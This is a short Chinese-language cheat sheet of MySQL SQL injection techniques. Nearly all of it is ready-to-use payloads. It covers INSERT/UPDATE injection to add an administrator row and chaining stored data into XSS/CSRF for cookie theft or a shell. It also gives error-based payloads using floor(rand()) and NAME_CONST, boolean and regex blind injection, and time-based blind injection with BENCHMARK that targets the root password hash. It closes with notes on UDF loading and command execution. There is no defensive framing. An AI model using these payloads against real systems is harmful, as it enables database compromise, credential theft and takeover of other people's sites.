mysql一般注入(二)
1.mysql一般注入(insert、update) mysql一般请求mysql_query不支持多语句执行,mysqli可以。 insert注入多使用报错注入! 1.如果可以直接插入管理员可以直接使用! insert into user(username,password) values('xxxx',' xxxx'),('dddd','dddd')/* '); 2.如果可以插入一些数据,这些数据会在网页中显示,我们可以结合xxs和csrf来获取cookies或getshell update注入同上 2.mysql报错注入 1. and(select 1 from(select count(*),concat((select (select (语句)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 语句处填入一般一句,如:SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1 2. and+1=(select+*+from+(select+NAME_CONST((语句),1),NAME_CONST((语句),1))+as+x)-- 3.update web_ids set host='www.0x50sec.org' where id =1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (语句)),1,62)))a from information_schema.tables group by a)b); 4.insert into web_ids(host) values((select (1) from mysql.user where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (语句)),1,62)))a from information_schema.tables group by a)b))); 3.mysql一般盲注 使用ascii AND ascii(substring((SELECT password FROM users where id=1),1,1))=49 使用正则表达式 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1) 4.mysql时间盲注 1170 union select if(substring(current,1,1)=char(11),benchmark(5000000,encode('msg','by 5 seconds')),null) from (select database() as current) as tbl UNION SELECT IF(SUBSTRING(Password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root' 5. mysql数据库版本特性 1.mysql5.0以后 information.schema库出现 2.mysql5.1以后 udf 导入xxlibplugin 目录下 3.mysql5.x以后 system执行命令